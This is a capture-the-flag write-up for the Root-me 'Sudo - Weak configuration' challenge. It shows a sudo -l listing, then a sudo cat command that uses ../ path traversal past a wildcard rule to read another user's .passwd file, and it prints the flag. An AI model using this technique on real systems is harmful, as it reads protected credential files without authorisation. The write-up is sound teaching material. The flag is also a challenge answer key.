Root-me.org

Sudo - Weak configuration

Privilege escalation

We’re not given a lot of information about this one beside that sudo has a weak configuration. Let’s start by seeing our sudo rights.

sudo -l
[sudo] password for app-script-ch1:
Matching Defaults entries for app-script-ch1 on challenge02:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch1 may run the following commands on challenge02:
    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/*

We can run /bin/cat on everything in ../ch1/ch1/ as app-script-ch1-cracked.

The file that we want to read is in

You have to read the .passwd located in the following PATH :
/challenge/app-script/ch1/ch1cracked/

We’ll run the command as the other user and go back to read the file in ch1cracked.

sudo -u app-script-ch1-cracked /bin/cat /challenge/app-script/ch1/ch1/../ch1cracked/.passwd
b3_c4r3full_w1th_sud0